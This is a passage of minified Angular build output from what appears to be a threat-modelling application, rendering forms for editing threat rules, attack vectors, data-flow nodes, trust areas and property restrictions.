3px"],["color","primary",3,"checked","change"],["matInput","","type","number",3,"ngModel","ngModelChange"],[3,"entry"],["style","margin-top: 10px; margin-bottom: 10px;",4,"ngIf"],[2,"margin-top","10px","margin-bottom","10px"],[3,"capecID"],[3,"cweID"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"control","canEditName","canEditGroup"],[2,"margin-top","15px"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],["matExpansionPanelContent",""],[3,"canEdit","showAttackVector","threatRule"]],template:function(e,i){1&e&&ne(0,Zwe,162,75,"div",0),2&e&&F("ngIf",i.attackVector)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();function e8e(t,a){if(1&t){const e=Ye();m(0,"button",32),he("click",function(){return be(e),Me(V(3).threatRule.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function t8e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",4),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"input",30),he("ngModelChange",function(n){return be(e),Me(V(2).threatRule.Name=n)}),u(),s(7,"\n "),ne(8,e8e,6,3,"button",31),s(9,"\n "),u()}if(2&t){const e=V(2);g(3),ke(re(4,4,"properties.Name")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.threatRule.Name),g(2),F("ngIf",e.threatRule.Name)}}function i8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function a8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,i8e,2,2,"mat-option",11),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.Name),g(2),F("ngForOf",e.AttackVectors)}}function n8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function o8e(t,a){if(1&t&&(s(0,"\n "),it(1,"app-attack-vector",38),s(2,"\n ")),2&t){const e=V(3);g(1),F("canEdit",!1)("attackVector",e.threatRule.AttackVector)}}function r8e(t,a){if(1&t&&(m(0,"mat-accordion",35),s(1,"\n "),m(2,"mat-expansion-panel",36),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"mat-panel-description"),s(11),m(12,"mat-icon"),s(13,"info"),u(),s(14,"\n "),u(),s(15,"\n "),u(),s(16,"\n "),ne(17,o8e,3,2,"ng-template",37),s(18,"\n "),u(),s(19,"\n "),u()),2&t){const e=V(2);g(7),ct("\n ",re(8,2,"general.AttackVectorInfo"),"\n "),g(4),ct("\n ",e.threatRule.AttackVector.Name,"\n ")}}function s8e(t,a){if(1&t&&(m(0,"mat-option",40),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function c8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,s8e,2,3,"mat-option",39),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.Name),g(2),F("ngForOf",e.ThreatCategories)}}function l8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(3);F("value",e),g(1),ke(re(2,2,i.GetRuleGenerationTypeName(e)))}}function d8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(V(2).threatRule.RuleGenerationType=n)}),s(9,"\n "),ne(10,l8e,3,4,"mat-option",11),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),it(14,"br"),s(15,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,3,"properties.RuleGenerationType")),g(3),F("value",e.threatRule.RuleGenerationType),g(2),F("ngForOf",e.GetRuleGenerationTypes())}}function m8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function u8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,m8e,2,2,"mat-option",11),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.Name),g(2),F("ngForOf",e.ThreatRules)}}function h8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V().$implicit;return Me(V(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=V(4);F("value",e),g(1),ct("\n ",re(2,2,i.GetRestrictionTypeName(e)),"\n ")}}function f8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=V().$implicit;g(1),ke(re(2,1,e.DisplayName))}}function p8e(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ID)}}function _8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V(3).$implicit;return Me(V(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n "),ne(2,f8e,3,3,"ng-container",16),s(3,"\n "),ne(4,p8e,2,1,"ng-container",16),s(5,"\n "),u()}if(2&t){const e=a.$implicit;F("value",e.ID),g(2),F("ngIf",e.DisplayName),g(2),F("ngIf",!e.DisplayName)}}function g8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,_8e,6,3,"mat-option",47),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.GroupName),g(2),F("ngForOf",e.Properties)}}function C8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(V(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n "),Mt()}if(2&t){const e=V(2).$implicit;g(2),F("ngModel",e.PropertyRest.Value)}}function y8e(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(6);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function b8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"select",54),he("change",function(n){be(e);const r=V(2).$implicit;return Me(V(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n "),ne(4,y8e,3,4,"option",11),s(5,"\n "),u(),s(6,"\n "),Mt()}if(2&t){const e=V(2).$implicit,i=V(3);g(2),F("ngModel",e.PropertyRest.Value),g(2),F("ngForOf",i.GetLMHValues())}}function M8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",51),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(V().$implicit.PropertyRest.ID=n)}),s(9,"\n "),ne(10,g8e,4,2,"mat-optgroup",6),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(V(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n "),ne(17,C8e,4,1,"ng-container",16),s(18,"\n "),ne(19,b8e,7,2,"ng-container",16),s(20,"\n "),Mt()}if(2&t){const e=V().$implicit,i=V(3);g(5),ke(re(6,6,"general.PropertyName")),g(3),F("value",e.PropertyRest.ID),g(2),F("ngForOf",i.GetAvailablePropertyGroups(e)),g(5),ct("\n ",e.PropertyRest.ComparisonType,"\n "),g(2),F("ngIf","Check Box"==i.GetPropertyEditType(e)),g(2),F("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function v8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=V().$implicit;g(1),ke(re(2,1,e.DisplayName))}}function A8e(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ID)}}function T8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V(3).$implicit;return Me(V(3).SetPropertyDefaultValue(c.PhyElementRest.Property,r))}),s(1,"\n "),ne(2,v8e,3,3,"ng-container",16),s(3,"\n "),ne(4,A8e,2,1,"ng-container",16),s(5,"\n "),u()}if(2&t){const e=a.$implicit;F("value",e.ID),g(2),F("ngIf",e.DisplayName),g(2),F("ngIf",!e.DisplayName)}}function E8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,T8e,6,3,"mat-option",47),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.GroupName),g(2),F("ngForOf",e.Properties)}}function D8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(V(2).$implicit.PhyElementRest.Property.Value=n)}),u(),s(3,"\n "),Mt()}if(2&t){const e=V(2).$implicit;g(2),F("ngModel",e.PhyElementRest.Property.Value)}}function x8e(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(6);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function w8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"select",54),he("change",function(n){be(e);const r=V(2).$implicit;return Me(V(3).SetLWH(r.PhyElementRest.Property,n.target.value))}),s(3,"\n "),ne(4,x8e,3,4,"option",11),s(5,"\n "),u(),s(6,"\n "),Mt()}if(2&t){const e=V(2).$implicit,i=V(3);g(2),F("ngModel",e.PhyElementRest.Property.Value),g(2),F("ngForOf",i.GetLMHValues())}}function I8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",51),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(V().$implicit.PhyElementRest.Property.ID=n)}),s(9,"\n "),ne(10,E8e,4,2,"mat-optgroup",6),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),ne(14,D8e,4,1,"ng-container",16),s(15,"\n "),ne(16,w8e,7,2,"ng-container",16),s(17,"\n "),Mt()}if(2&t){const e=V().$implicit,i=V(3);g(5),ke(re(6,5,"general.PropertyName")),g(3),F("value",e.PhyElementRest.Property.ID),g(2),F("ngForOf",i.GetAvailablePhyElementPropertyGroups(e)),g(4),F("ngIf","Check Box"==i.GetPropertyEditType(e)),g(2),F("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function R8e(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=V().$implicit;g(1),ct("\n ",e.IsOR?"OR":"AND","\n ")}}function S8e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(11,"\n "),ne(12,h8e,3,4,"mat-option",47),s(13,"\n "),u(),s(14,"\n "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(V(3).RemoveStencilRestriction(r))}),oe(16,"translate"),s(17,"\n "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n "),u(),s(21,"\n "),u(),s(22,"\n "),s(23,"\n "),ne(24,M8e,21,8,"ng-container",16),s(25,"\n "),s(26,"\n "),ne(27,I8e,18,7,"ng-container",16),s(28,"\n "),ne(29,R8e,2,1,"button",49),s(30,"\n "),u()}if(2&t){const e=a.$implicit,i=a.last,n=V(3);g(2),ri("padding-left",n.GetLayerPadding(e)),g(3),ke(re(6,10,"general.Type")),g(3),F("ngModel",e.Layer),g(2),F("value",e.RestType),g(2),F("ngForOf",n.GetAvailableRestrictionsTypes(e)),g(3),at("matTooltip",re(16,12,"general.Delete")),g(9),F("ngIf",1==e.RestType),g(3),F("ngIf",3==e.RestType),g(2),F("ngIf",!i)}}function k8e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",41),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),it(8,"input",42),s(9,"\n "),u(),s(10,"\n "),it(11,"br"),s(12),oe(13,"translate"),m(14,"button",43),he("click",function(){return be(e),Me(V(2).AddStencilRestriction())}),oe(15,"translate"),s(16,"\n "),m(17,"mat-icon"),s(18,"add"),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"span",44),s(22),u(),s(23,"\n "),m(24,"div"),s(25,"\n "),ne(26,S8e,31,14,"div",45),s(27,"\n "),u(),s(28,"\n "),u()}if(2&t){const e=V(2);g(5),ke(re(6,8,"properties.StencilType")),g(3),at("matTooltip",null==e.selectedStencilType?null:e.selectedStencilType.Name),F("spellcheck",e.dataService.HasSpellCheck)("value",null==e.selectedStencilType?null:e.selectedStencilType.Name),g(4),ct("\n ",re(13,10,"properties.Restrictions")," \n "),g(2),at("matTooltip",re(15,12,"general.Add")),g(8),ke(e.GetRestrictionString()),g(4),F("ngForOf",e.threatRule.StencilRestriction.DetailRestrictions)}}function P8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;F("value",a.index-1),g(1),ct("\n ",e,"\n ")}}function O8e(t,a){1&t&&(m(0,"mat-label"),s(1),oe(2,"translate"),u()),2&t&&(g(1),ke(re(2,1,"properties.Sender")))}function N8e(t,a){1&t&&(m(0,"mat-label"),s(1),oe(2,"translate"),u()),2&t&&(g(1),ke(re(2,1,"properties.Receiver")))}function L8e(t,a){if(1&t&&(m(0,"mat-label"),s(1),u()),2&t){const e=V().index;g(1),ct("Node",e,"")}}function z8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){return be(e),Me(V(4).propertyGroups={})}),s(1),u()}if(2&t){const e=a.$implicit;F("value",null==e?null:e.ID),g(1),ct("\n ",null==e?null:e.Name,"\n ")}}function W8e(t,a){if(1&t){const e=Ye();m(0,"button",48),he("click",function(){be(e);const n=V().index,r=Ti(11);return Me(V(3).RemoveDFDNode(n,r))}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"delete"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Delete"))}function F8e(t,a){if(1&t){const e=Ye();m(0,"button",55),he("click",function(){be(e);const n=V().index;return Me(V(3).AddDFDNode(n+1))}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon",56),s(4,"east"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"pages.config.threatrule.addNode"))}function V8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),ne(4,O8e,3,3,"mat-label",16),s(5,"\n "),ne(6,N8e,3,3,"mat-label",16),s(7,"\n "),ne(8,L8e,2,1,"mat-label",16),s(9,"\n "),m(10,"mat-select",14,57),he("valueChange",function(n){return Me(be(e).$implicit.TypeIDs=n)}),s(12,"\n "),m(13,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V(3);return r.TypeIDs=[],Me(c.propertyGroups={})}),s(14),oe(15,"translate"),u(),s(16,"\n "),ne(17,z8e,2,2,"mat-option",47),s(18,"\n "),u(),s(19,"\n "),ne(20,W8e,6,3,"button",58),s(21,"\n "),u(),s(22,"\n "),ne(23,F8e,6,3,"button",59),s(24,"\n "),Mt()}if(2&t){const e=a.$implicit,i=a.first,n=a.last,r=V(3);g(4),F("ngIf",i),g(2),F("ngIf",n),g(2),F("ngIf",!i&&!n),g(2),F("value",e.TypeIDs),g(4),ke(re(15,8,"pages.config.Any")),g(3),F("ngForOf",r.GetDataFlowEntityTypes()),g(3),F("ngIf",!i&&!n),g(3),F("ngIf",!n)}}function B8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;F("value",a.index-1),g(1),ct("\n ",e,"\n ")}}function H8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V().$implicit;return Me(V(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=V(4);F("value",e),g(1),ct("\n ",re(2,2,i.GetRestrictionTypeName(e)),"\n ")}}function U8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=V().$implicit;g(1),ke(re(2,1,e.DisplayName))}}function q8e(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ID)}}function G8e(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V(3).$implicit;return Me(V(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n "),ne(2,U8e,3,3,"ng-container",16),s(3,"\n "),ne(4,q8e,2,1,"ng-container",16),s(5,"\n "),u()}if(2&t){const e=a.$implicit;F("value",e.ID),g(2),F("ngIf",e.DisplayName),g(2),F("ngIf",!e.DisplayName)}}function j8e(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,G8e,6,3,"mat-option",47),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.GroupName),g(2),F("ngForOf",e.Properties)}}function Q8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(V(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n "),Mt()}if(2&t){const e=V(2).$implicit;g(2),F("ngModel",e.PropertyRest.Value)}}function $8e(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(6);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function K8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"select",54),he("change",function(n){be(e);const r=V(2).$implicit;return Me(V(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n "),ne(4,$8e,3,4,"option",11),s(5,"\n "),u(),s(6,"\n "),Mt()}if(2&t){const e=V(2).$implicit,i=V(3);g(2),F("ngModel",e.PropertyRest.Value),g(2),F("ngForOf",i.GetLMHValues())}}function X8e(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",51),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(V().$implicit.PropertyRest.ID=n)}),s(9,"\n "),ne(10,j8e,4,2,"mat-optgroup",6),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(V(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n "),ne(17,Q8e,4,1,"ng-container",16),s(18,"\n "),ne(19,K8e,7,2,"ng-container",16),s(20,"\n "),Mt()}if(2&t){const e=V().$implicit,i=V(3);g(5),ke(re(6,6,"general.PropertyName")),g(3),F("value",e.PropertyRest.ID),g(2),F("ngForOf",i.GetAvailablePropertyGroups(e)),g(5),ct("\n ",e.PropertyRest.ComparisonType,"\n "),g(2),F("ngIf","Check Box"==i.GetPropertyEditType(e)),g(2),F("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function Y8e(t,a){if(1&t&&(m(0,"mat-option",34),s(1),u()),2&t){const e=a.$implicit;F("value",e.ID),g(1),ct("\n ",e.Name,"\n ")}}function J8e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",51),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"mat-select",14),he("valueChange",function(n){return be(e),Me(V().$implicit.DataflowRest.TrustAreaIDs=n)}),s(7,"\n "),m(8,"mat-option",50),he("click",function(){return be(e),Me(V().$implicit.DataflowRest.TrustAreaIDs=[])}),s(9),oe(10,"translate"),u(),s(11,"\n "),ne(12,Y8e,2,2,"mat-option",11),s(13,"\n "),u(),s(14,"\n "),u()}if(2&t){const e=V().$implicit,i=V(3);g(3),ke(re(4,4,"pages.config.threatrule.crosses")),g(3),F("value",e.DataflowRest.TrustAreaIDs),g(3),ke(re(10,6,"pages.config.Any")),g(3),F("ngForOf",i.GetAvailableTrustAreas())}}function Z8e(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=V().$implicit;g(1),ke(re(2,1,e.DisplayName))}}function eIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ID)}}function tIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V(3).$implicit;return Me(V(3).SetPropertyDefaultValue(c.PhyElementRest.Property,r))}),s(1,"\n "),ne(2,Z8e,3,3,"ng-container",16),s(3,"\n "),ne(4,eIe,2,1,"ng-container",16),s(5,"\n "),u()}if(2&t){const e=a.$implicit;F("value",e.ID),g(2),F("ngIf",e.DisplayName),g(2),F("ngIf",!e.DisplayName)}}function iIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,tIe,6,3,"mat-option",47),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.GroupName),g(2),F("ngForOf",e.Properties)}}function aIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(V(2).$implicit.PhyElementRest.Property.Value=n)}),u(),s(3,"\n "),Mt()}if(2&t){const e=V(2).$implicit;g(2),F("ngModel",e.PhyElementRest.Property.Value)}}function nIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(6);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function oIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"select",54),he("change",function(n){be(e);const r=V(2).$implicit;return Me(V(3).SetLWH(r.PhyElementRest.Property,n.target.value))}),s(3,"\n "),ne(4,nIe,3,4,"option",11),s(5,"\n "),u(),s(6,"\n "),Mt()}if(2&t){const e=V(2).$implicit,i=V(3);g(2),F("ngModel",e.PhyElementRest.Property.Value),g(2),F("ngForOf",i.GetLMHValues())}}function rIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",51),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(V().$implicit.PhyElementRest.Property.ID=n)}),s(9,"\n "),ne(10,iIe,4,2,"mat-optgroup",6),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),ne(14,aIe,4,1,"ng-container",16),s(15,"\n "),ne(16,oIe,7,2,"ng-container",16),s(17,"\n "),Mt()}if(2&t){const e=V().$implicit,i=V(3);g(5),ke(re(6,5,"general.PropertyName")),g(3),F("value",e.PhyElementRest.Property.ID),g(2),F("ngForOf",i.GetAvailablePhyElementPropertyGroups(e)),g(4),F("ngIf","Check Box"==i.GetPropertyEditType(e)),g(2),F("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function sIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=V().$implicit;g(1),ke(re(2,1,e.DisplayName))}}function cIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ID)}}function lIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V(3).$implicit;return Me(V(3).SetPropertyDefaultValue(c.SenderInterfaceRestriction.Property,r))}),s(1,"\n "),ne(2,sIe,3,3,"ng-container",16),s(3,"\n "),ne(4,cIe,2,1,"ng-container",16),s(5,"\n "),u()}if(2&t){const e=a.$implicit;F("value",e.ID),g(2),F("ngIf",e.DisplayName),g(2),F("ngIf",!e.DisplayName)}}function dIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,lIe,6,3,"mat-option",47),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.GroupName),g(2),F("ngForOf",e.Properties)}}function mIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(V(2).$implicit.SenderInterfaceRestriction.Property.Value=n)}),u(),s(3,"\n "),Mt()}if(2&t){const e=V(2).$implicit;g(2),F("ngModel",e.SenderInterfaceRestriction.Property.Value)}}function uIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(6);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function hIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"select",54),he("change",function(n){be(e);const r=V(2).$implicit;return Me(V(3).SetLWH(r.SenderInterfaceRestriction.Property,n.target.value))}),s(3,"\n "),ne(4,uIe,3,4,"option",11),s(5,"\n "),u(),s(6,"\n "),Mt()}if(2&t){const e=V(2).$implicit,i=V(3);g(2),F("ngModel",e.SenderInterfaceRestriction.Property.Value),g(2),F("ngForOf",i.GetLMHValues())}}function fIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",51),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(V().$implicit.SenderInterfaceRestriction.Property.ID=n)}),s(9,"\n "),ne(10,dIe,4,2,"mat-optgroup",6),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(V(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n "),ne(17,mIe,4,1,"ng-container",16),s(18,"\n "),ne(19,hIe,7,2,"ng-container",16),s(20,"\n "),Mt()}if(2&t){const e=V().$implicit,i=V(3);g(5),ke(re(6,6,"general.PropertyName")),g(3),F("value",e.SenderInterfaceRestriction.Property.ID),g(2),F("ngForOf",i.GetAvailableInterfacePropertyGroups(e)),g(5),ct("\n ",e.PropertyRest.ComparisonType,"\n "),g(2),F("ngIf","Check Box"==i.GetPropertyEditType(e)),g(2),F("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function pIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=V().$implicit;g(1),ke(re(2,1,e.DisplayName))}}function _Ie(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ID)}}function gIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V(3).$implicit;return Me(V(3).SetPropertyDefaultValue(c.ReceiverInterfaceRestriction.Property,r))}),s(1,"\n "),ne(2,pIe,3,3,"ng-container",16),s(3,"\n "),ne(4,_Ie,2,1,"ng-container",16),s(5,"\n "),u()}if(2&t){const e=a.$implicit;F("value",e.ID),g(2),F("ngIf",e.DisplayName),g(2),F("ngIf",!e.DisplayName)}}function CIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n 